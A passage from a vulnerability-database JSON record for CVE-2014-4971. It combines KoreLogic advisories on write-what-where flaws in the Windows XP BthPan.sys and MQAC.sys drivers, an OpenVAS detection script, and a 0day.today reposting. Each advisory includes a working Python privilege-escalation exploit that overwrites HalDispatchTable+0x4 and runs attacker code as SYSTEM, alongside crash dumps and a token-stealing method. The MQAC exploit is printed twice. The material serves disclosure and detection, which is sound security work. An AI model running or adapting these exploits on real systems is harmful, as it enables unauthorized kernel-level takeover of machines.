nt!IopXxxControlFile+0x5e7\nb1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\nWARNING: Stack unwind information not available. Following frames may be wrong.\n\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\n command shows the fault originating in the bthpan driver.\n\nFOLLOWUP_IP:\nbthpan!BthpanReqAdd+16b\nb272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565)\n\n Reviewing the TRAP_FRAME at the time of crash we can see\n IopCompleteRequest() copying data from InputBuffer into the\n OutputBuffer. InputBuffer is another parameter provided to the\n DeviceIoControlFile() function and is therefore controllable by\n the attacker. The edi register contains the invalid address\n provided during the fuzz testcase.\n\nTRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630)\nErrCode = 00000002\neax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000\neip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203\nnt!IopCompleteRequest+0x92:\n804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]\n\n A write-what-where vulnerability can be leveraged to obtain\n escalated privileges. To do so, an attacker will need to\n allocate memory in userland that is populated with shellcode\n designed to find the Token for PID 4 (System) and then overwrite\n the token for its own process. By leveraging the vulnerability\n in BthPan it is then possible to overwrite the pointer at\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\n NtQueryIntervalProfile() will subsequently call\n HalDispatchTable+0x4, execute our shellcode, and elevate the\n privilege of the exploit process.\n\n4. Mitigation and Remediation Recommendation\n\n None. A patch is not likely to be forthcoming from the vendor.\n\n5. Credit\n\n This vulnerability was discovered by Matt Bergin of KoreLogic\n Security, Inc.\n\n6. Disclosure Timeline\n\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\n report; states XP is no longer supported and asks if\n the vulnerability affects other versions of Windows.\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\n support policy for XP.\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\n addressed with patches.\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\n vulnerability report.\n 2014.04.29 - Microsoft opens case to investigate the impact of the\n vulnerability on non-XP systems.\n 2014.05.06 - Microsoft asks again if this vulnerability affects\n non-XP systems.\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\n report is for XP and other Windows versions have not\n been examined.\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days have\n passed since vendor acknowledgement of the initial\n report. KoreLogic requests CVE number for the\n vulnerability, if there is one. KoreLogic also\n requests vendor's public identifier for the\n vulnerability along with the expected disclosure date.\n 2014.06.11 - Microsoft informs KoreLogic that the vulnerability\n does not impact any \"up-platform\" products. Says they\n are investigating embedded platforms. Does not provide\n CVE number.\n 2014.06.24 - Microsoft contacts KoreLogic to say that they confused\n the report of this vulnerability with another and that\n they cannot reproduce the described behavior.\n Microsoft asks for an updated Proof-of-Concept, crash\n dumps or any further analysis of the vulnerability\n that KoreLogic can provide.\n 2014.06.25 - KoreLogic provides Microsoft with an updated\n Proof-of-Concept which demonstrates using the\n vulnerability to spawn a system shell.\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\n receipt of the updated PoC. Also requests that a CVE\n ID be issued for this vulnerability.\n 2014.07.02 - 45 business days have elapsed since Microsoft\n acknowledged receipt of the vulnerability report and\n PoC.\n 2014.07.07 - KoreLogic requests CVE from MITRE.\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be\n identical to KL-001-2014-003 and issues CVE-2014-4971\n for both vulnerabilities.\n 2014.07.18 - Public disclosure.\n\n7. Proof of Concept\n\n #!/usr/bin/python2\n #\n # KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\n # Matt Bergin (KoreLogic / Smash the Stack) \n # CVE-2014-4971\n #\n from ctypes import *\n from struct import pack\n from os import getpid,system\n from sys import exit\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\n \n # thanks to offsec for the concept\n # I re-wrote the code as to not fully insult them :)\n def getBase(name=None):\n \tretArray = c_ulong*1024\n \tImageBase = retArray()\n \tcallback = c_int(1024)\n \tcbNeeded = c_long()\n \tEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\n \tfor base in ImageBase:\n \t\tdriverName = c_char_p(\"\\x00\"*1024)\n \t\tGetDeviceDriverBaseNameA(base,driverName,48)\n \t\tif (name):\n \t\t\tif (driverName.value.lower() == name):\n \t\t\t\treturn base\n \t\telse:\n \t\t\treturn (base,driverName.value)\n \treturn None\n \n handle = CreateFileA(\"\\\\\\\\.\\\\BthPan\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\n if (handle == INVALID_HANDLE_VALUE):\n\tprint \"[!] Could not open handle to BthPan\"\n\texit(1)\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\n buf = \"\\xcc\\xcc\\xcc\\xcc\"+\"\\x90\"*0x400\n WriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0)))\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\n kBase,kVer = getBase()\n hKernel = LoadLibraryExA(kVer,0,1)\n HalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\")\n HalDispatchTable -= hKernel\n HalDispatchTable += kBase\n HalDispatchTable += 0x4\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)\n CloseHandle(handle)\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\n exit(0)", "modified": "2014-07-18T00:00:00", "published": "2014-07-18T00:00:00", "href": "https://korelogic.com/Resources/Advisories/KL-001-2014-002.txt", "id": "KL-001-2014-002", "type": "korelogic", "title": "Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-11T21:22:38", "bulletinFamily": "software", "cvelist": ["CVE-2014-4971"], "edition": 2, "description": "Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\nAdvisory ID: KL-001-2014-003\nPublication Date: 2014.07.18\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt\n\n\n1. Vulnerability Details\n\n Affected Vendor: Microsoft\n Affected Product: MQ Access Control\n Affected Versions: 5.1.0.1110\n Platform: Microsoft Windows XP SP3\n CWE Classification: CWE-123: Write-what-where Condition\n Impact: Privilege Escalation\n Attack vector: IOCTL\n CVE ID: CVE-2014-4971\n\n2. Vulnerability Description\n\n A vulnerability within the MQAC module allows an attacker to\n inject memory they control into an arbitrary location they\n define. This can be used by an attacker to overwrite\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\n calling NtQueryIntervalProfile.\n\n3. Technical Description\n\n A userland process can create a handle into the MQAC device and\n subsequently make DeviceIoControlFile() calls into that device.\n During the IRP handler routine for 0x1965020f the user provided\n OutputBuffer address is not validated. This allows an attacker\n to specify an arbitrary address and write (or overwrite) the\n memory residing at the specified address. This is classically\n known as a write-what-where vulnerability and has well known\n exploitation methods associated with it.\n\n A stack trace from our fuzzing can be seen below. In our\n fuzzing testcase, the specified OutputBuffer in the\n DeviceIoControlFile() call is 0xffff0000.\n\nSTACK_TEXT: \nb1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\nb1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\nb1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\nb1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d\nb1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d\nb1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31\nb1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70\nb1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7\nb1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\n\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\n command shows the fault originating in the mqac driver.\n\nOLLOWUP_IP: \nmqac!AC2QM+5d\nb230af37 891e mov dword ptr [esi],ebx\n\n Reviewing the TRAP_FRAME at the time of crash we can see\n IopCompleteRequest() copying data from InputBuffer into the\n OutputBuffer. InputBuffer is another parameter provided to the\n DeviceIoControlFile() function and is therefore controllable by\n the attacker. The edi register contains the invalid address\n provided during the fuzz testcase.\n\nTRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4)\nErrCode = 00000002\neax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000\neip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246\nmqac!AC2QM+0x5d:\nb230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=????????\n\n A write-what-where vulnerability can be leveraged to obtain\n escalated privileges. To do so, an attacker will need to\n allocate memory in userland that is populated with shellcode\n designed to find the Token for PID 4 (System) and then overwrite\n the token for its own process. By leveraging the vulnerability\n in MQAC it is then possible to overwrite the pointer at\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\n NtQueryIntervalProfile() will subsequently call\n HalDispatchTable+0x4, execute our shellcode, and elevate the\n privilege of the exploit process.\n\n4. Mitigation and Remediation Recommendation\n\n None. A patch is not likely to be forthcoming from the vendor.\n\n5. Credit\n\n This vulnerability was discovered by Matt Bergin of KoreLogic\n Security, Inc.\n\n6. Disclosure Timeline\n\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\n report; states XP is no longer supported and asks if\n the vulnerability affects other versions of Windows.\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\n support policy for XP.\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\n addressed with patches.\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\n vulnerability report.\n 2014.04.29 - Microsoft opens case to investigate the impact of the\n vulnerability on non-XP systems.\n 2014.05.06 - Microsoft asks again if this vulnerability affects\n non-XP systems.\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\n report is for XP and other Windows versions have\n not been examined.\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days\n have passed since vendor acknowledgement of the\n initial report. KoreLogic requests CVE number for the\n vulnerability, if there is one. KoreLogic also\n requests vendor's public identifier for the\n vulnerability along with the expected disclosure date.\n 2014.06.11 - Microsoft responds to KoreLogic that the\n vulnerability does not affect an \"up-platform\"\n product. Says they are investigating embedded\n platforms. Does not provide a CVE number or a\n disclosure date.\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\n receipt of the updated PoC. Also requests that\n a CVE ID be issued to this vulnerability.\n 2014.07.02 - 45 business days have elapsed since Microsoft\n acknowledged receipt of the vulnerability report and\n PoC.\n 2014.07.07 - KoreLogic requests CVE from MITRE.\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to\n be identical to KL-001-2014-002 and issues\n CVE-2014-4971 for both vulnerabilities.\n 2014.07.18 - Public disclosure.\n\n7. Proof of Concept\n\n #!/usr/bin/python2\n #\n # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\n # Matt Bergin (KoreLogic / Smash the Stack)\n # CVE-2014-4971\n #\n from ctypes import *\n from struct import pack\n from os import getpid,system\n from sys import exit\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\n\n # thanks to offsec for the concept\n # I re-wrote the code as to not fully insult them :)\n def getBase(name=None):\n \tretArray = c_ulong*1024\n \tImageBase = retArray()\n \tcallback = c_int(1024)\n \tcbNeeded = c_long()\n \tEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\n \tfor base in ImageBase:\n \t\tdriverName = c_char_p(\"\\x00\"*1024)\n \t\tGetDeviceDriverBaseNameA(base,driverName,48)\n \t\tif (name):\n \t\t\tif (driverName.value.lower() == name):\n \t\t\t\treturn base\n \t\telse:\n \t\t\treturn (base,driverName.value)\n \treturn None\n\n handle = CreateFileA(\"\\\\\\\\.\\\\MQAC\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\n print \"[+] Handle \\\\\\\\.\\\\MQAC @ %s\" % (handle)\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\n buf = \"\\x50\\x00\\x00\\x00\"+\"\\x90\"*0x400\n WriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0)))\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\n WriteProcessMemory(-1, 0x5000, \"\\xcc\", 77, byref(c_int(0)))\n #Overwrite Pointer\n kBase,kVer = getBase()\n hKernel = LoadLibraryExA(kVer,0,1)\n HalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\")\n HalDispatchTable -= hKernel\n HalDispatchTable += kBase\n HalDispatchTable += 0x4\n print \"[+] Kernel @ %s, HalDispatchTable @ %s\" % (hex(kBase),hex(HalDispatchTable))\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)\n print \"[+] HalDispatchTable+0x4 overwritten\"\n CloseHandle(handle)\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\n exit(0)", "modified": "2014-07-18T00:00:00", "published": "2014-07-18T00:00:00", "href": "https://korelogic.com/Resources/Advisories/KL-001-2014-003.txt", "id": "KL-001-2014-003", "title": "Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation", "type": "korelogic", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-10T19:52:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4971"], "description": "This host is missing an important security\n update according to Microsoft Bulletin MS14-062.", "modified": "2020-06-09T00:00:00", "published": "2014-10-15T00:00:00", "id": "OPENVAS:1361412562310804492", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804492", "type": "openvas", "title": "Microsoft Windows Message Queuing Service Privilege Escalation Vulnerability (2993254)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Message Queuing Service Privilege Escalation Vulnerability (2993254)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804492\");\n script_version(\"2020-06-09T08:59:39+0000\");\n script_cve_id(\"CVE-2014-4971\");\n script_bugtraq_id(68764);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 08:59:39 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-10-15 08:38:41 +0530 (Wed, 15 Oct 2014)\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Microsoft Windows Message Queuing Service Privilege Escalation Vulnerability (2993254)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft Bulletin MS14-062.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error when handling\n objects within the Message Queuing service, which can be exploited to elevate\n privileges by sending a specially crafted IOCTL request.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow\n local users to gain escalated privileges.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 2003 x32/x64 Service Pack 2 and prior.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS14-062\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2003:3, win2003x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath){\n exit(0);\n}\n\nwin32SysVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\drivers\\Mqac.sys\");\nif(!win32SysVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win2003:3, win2003x64:3) > 0)\n{\n if(version_is_less(version:win32SysVer, test_version:\"5.2.2008.5417\")){\n report = report_fixed_ver(installed_version:win32SysVer, fixed_version:\"5.2.2008.5417\", install_path:sysPath);\n security_message(port:0, data:report);\n }\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-02T05:26:05", "description": "Exploit for windows platform in category local exploits", "edition": 2, "published": "2014-07-22T00:00:00", "type": "zdt", "title": "Microsoft XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-22T00:00:00", "id": "1337DAY-ID-22462", "href": "https://0day.today/exploit/description/22462", "sourceData": "Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\r\nPublication Date: 2014.07.18\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt\r\n \r\n \r\n1. Vulnerability Details\r\n \r\n Affected Vendor: Microsoft\r\n Affected Product: MQ Access Control\r\n Affected Versions: 5.1.0.1110\r\n Platform: Microsoft Windows XP SP3\r\n CWE Classification: CWE-123: Write-what-where Condition\r\n Impact: Privilege Escalation\r\n Attack vector: IOCTL\r\n CVE ID: CVE-2014-4971\r\n \r\n2. Vulnerability Description\r\n \r\n A vulnerability within the MQAC module allows an attacker to\r\n inject memory they control into an arbitrary location they\r\n define. This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\r\n calling NtQueryIntervalProfile.\r\n \r\n3. Technical Description\r\n \r\n A userland process can create a handle into the MQAC device and\r\n subsequently make DeviceIoControlFile() calls into that device.\r\n During the IRP handler routine for 0x1965020f the user provided\r\n OutputBuffer address is not validated. This allows an attacker\r\n to specify an arbitrary address and write (or overwrite) the\r\n memory residing at the specified address. This is classically\r\n known as a write-what-where vulnerability and has well known\r\n exploitation methods associated with it.\r\n \r\n A stack trace from our fuzzing can be seen below. In our\r\n fuzzing testcase, the specified OutputBuffer in the\r\n DeviceIoControlFile() call is 0xffff0000.\r\n \r\nSTACK_TEXT: \r\nb1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\r\nb1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\r\nb1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\r\nb1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d\r\nb1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d\r\nb1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31\r\nb1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70\r\nb1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7\r\nb1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\n \r\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\r\n command shows the fault originating in the mqac driver.\r\n \r\nOLLOWUP_IP:\r\nmqac!AC2QM+5d\r\nb230af37 891e mov dword ptr [esi],ebx\r\n \r\n Reviewing the TRAP_FRAME at the time of crash we can see\r\n IopCompleteRequest() copying data from InputBuffer into the\r\n OutputBuffer. InputBuffer is another parameter provided to the\r\n DeviceIoControlFile() function and is therefore controllable by\r\n the attacker. The edi register contains the invalid address\r\n provided during the fuzz testcase.\r\n \r\nTRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4)\r\nErrCode = 00000002\r\neax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000\r\neip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246\r\nmqac!AC2QM+0x5d:\r\nb230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=????????\r\n \r\n A write-what-where vulnerability can be leveraged to obtain\r\n escalated privileges. To do so, an attacker will need to\r\n allocate memory in userland that is populated with shellcode\r\n designed to find the Token for PID 4 (System) and then overwrite\r\n the token for its own process. By leveraging the vulnerability\r\n in MQAC it is then possible to overwrite the pointer at\r\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\r\n NtQueryIntervalProfile() will subsequently call\r\n HalDispatchTable+0x4, execute our shellcode, and elevate the\r\n privilege of the exploit process.\r\n \r\n4. Mitigation and Remediation Recommendation\r\n \r\n None. A patch is not likely to be forthcoming from the vendor.\r\n \r\n5. Credit\r\n \r\n This vulnerability was discovered by Matt Bergin of KoreLogic\r\n Security, Inc.\r\n \r\n6. Disclosure Timeline\r\n \r\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\r\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\r\n report; states XP is no longer supported and asks if\r\n the vulnerability affects other versions of Windows.\r\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\r\n support policy for XP.\r\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\r\n addressed with patches.\r\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\r\n vulnerability report.\r\n 2014.04.29 - Microsoft opens case to investigate the impact of the\r\n vulnerability on non-XP systems.\r\n 2014.05.06 - Microsoft asks again if this vulnerability affects\r\n non-XP systems.\r\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\r\n report is for XP and other Windows versions have\r\n not been examined.\r\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days\r\n have passed since vendor acknowledgement of the\r\n initial report. KoreLogic requests CVE number for the\r\n vulnerability, if there is one. KoreLogic also\r\n requests vendor's public identifier for the\r\n vulnerability along with the expected disclosure date.\r\n 2014.06.11 - Microsoft responds to KoreLogic that the\r\n vulnerability does not affect an \"up-platform\"\r\n product. Says they are investigating embedded\r\n platforms. Does not provide a CVE number or a\r\n disclosure date.\r\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\r\n receipt of the updated PoC. Also requests that\r\n a CVE ID be issued to this vulnerability.\r\n 2014.07.02 - 45 business days have elapsed since Microsoft\r\n acknowledged receipt of the vulnerability report and\r\n PoC.\r\n 2014.07.07 - KoreLogic requests CVE from MITRE.\r\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to\r\n be identical to KL-001-2014-002 and issues\r\n CVE-2014-4971 for both vulnerabilities.\r\n 2014.07.18 - Public disclosure.\r\n \r\n7. Proof of Concept\r\n \r\n #!/usr/bin/python2\r\n #\r\n # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\r\n # Matt Bergin (KoreLogic / Smash the Stack)\r\n # CVE-2014-4971\r\n #\r\n from ctypes import *\r\n from struct import pack\r\n from os import getpid,system\r\n from sys import exit\r\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\r\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\r\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\r\n \r\n # thanks to offsec for the concept\r\n # I re-wrote the code as to not fully insult them :)\r\n def getBase(name=None):\r\n retArray = c_ulong*1024\r\n ImageBase = retArray()\r\n callback = c_int(1024)\r\n cbNeeded = c_long()\r\n EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\r\n for base in ImageBase:\r\n driverName = c_char_p(\"\\x00\"*1024)\r\n GetDeviceDriverBaseNameA(base,driverName,48)\r\n if (name):\r\n if (driverName.value.lower() == name):\r\n return base\r\n else:\r\n return (base,driverName.value)\r\n return None\r\n \r\n handle = CreateFileA(\"\\\\\\\\.\\\\MQAC\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\r\n print \"[+] Handle \\\\\\\\.\\\\MQAC @ %s\" % (handle)\r\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\r\n buf = \"\\x50\\x00\\x00\\x00\"+\"\\x90\"*0x400\r\n WriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x5000, \"\\xcc\", 77, byref(c_int(0)))\r\n #Overwrite Pointer\r\n kBase,kVer = getBase()\r\n hKernel = LoadLibraryExA(kVer,0,1)\r\n HalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\")\r\n HalDispatchTable -= hKernel\r\n HalDispatchTable += kBase\r\n HalDispatchTable += 0x4\r\n print \"[+] Kernel @ %s, HalDispatchTable @ %s\" % (hex(kBase),hex(HalDispatchTable))\r\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)\r\n print \"[+] HalDispatchTable+0x4 overwritten\"\r\n CloseHandle(handle)\r\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\r\n exit(0)\r\n \r\nThe contents of this advisory are copyright(c) 2014\r\nKoreLogic, Inc. and are licensed under a Creative Commons\r\nAttribution Share-Alike 4.0 (United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n \r\nKoreLogic, Inc. is a founder-owned and operated company with a\r\nproven track record of providing security services to entities\r\nranging from Fortune 500 to small and mid-sized companies. We\r\nare a highly skilled team of senior security consultants doing\r\nby-hand security assessments for the most important networks in\r\nthe U.S. and around the world. We are also developers of various\r\ntools and resources aimed at helping the security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n \r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 7.2, "vector": 